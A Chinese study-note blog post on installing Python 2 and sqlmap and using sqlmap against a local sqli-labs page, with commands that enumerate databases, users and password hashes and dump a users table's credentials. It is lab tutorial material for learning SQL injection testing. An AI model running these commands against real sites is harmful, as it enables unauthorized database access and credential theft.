SQLmap

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

python2安装包:链接:https://pan.baidu.com/s/19jv1KZiBP8LiW3JbJKwo_w
提取码:ullc

Sqlmap安装包:链接:https://pan.baidu.com/s/1p533gyUcCIPvGuxnwJhAPA&shfl=sharepset
提取码:8ad4

简介:
一、安装python环境
二、解压SQLmap 并创建快捷方式
(注意:要解压sqlmap的时候,直接解压到python文件夹下)
三、SQLmap 爆出数据库

SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
方法:打开sqlmap输入Python sqlmap.py -u +url
(本机SQLmap 是基于python2 环境运行,故调用python2. 请参照自己PC情况而定)

第一:python环境安装:
SQLmap是由python语言开发的工具,所以要先安装python环境
1、运行python的安装程序选中自主安装
点击打勾✔:Add PythonPATH (添加python的环境变量)
2、默认全选点击next进行安装
3、可自定义python的安装位置,点击install
4、安装完成,点击close关闭
确认安装:
打开cmd,输入python,能直接进入回显python版本信息说明安装成功
在这里插入图片描述

第二:下载好的SQLmap文件直接解压到python文件夹下
创建桌面快捷方式

在这里插入图片描述

1、进入到Python2,sqlmap目录下,右键点击sqlmap,py类型文件发送到桌面快捷方式。
在这里插入图片描述
2、将快捷方式重命名为sqlmap,然后右键属性—在目标栏输入:“%windir%\system32\cmd.exe”

此时,SQLmap的快捷方式就创建好了
确认:打开快捷方式,输入 python sqlmap.py
页面显示:
在这里插入图片描述

第三:SQLmap 命令使用

1、指定目标注入地址)检测出存在可利用漏洞
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”

在这里插入图片描述
在这里插入图片描述
2、曝出所有数据库名称:–dbs:dbs前面有两条杠
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --dbs

在这里插入图片描述
3、web当前使用的数据库
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --current-db

在这里插入图片描述
4、列出当前数据库里所有的用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --users

在这里插入图片描述

5、列出当前数据库里的当前用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–current-user

在这里插入图片描述
6、列出当前数据库里账户名,密码
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–passwords

在这里插入图片描述

sqlmap已经做了MD5解密

在这里插入图片描述

7、列出数据库中的表参数:(-D:指定数据库名称 --tables:列出表)
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security --tables

在这里插入图片描述

8、列出表中字段 (-D:指定数据库名称;-T:指定要列出字段的表;–columns:指定表的所有列 )
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”-D security -T users --columns

在这里插入图片描述
9、列出三个数据列中所有的数据: (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security -T users -C id,username,password --dump

在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 创作都市 设计师:CSDN官方博客 返回首页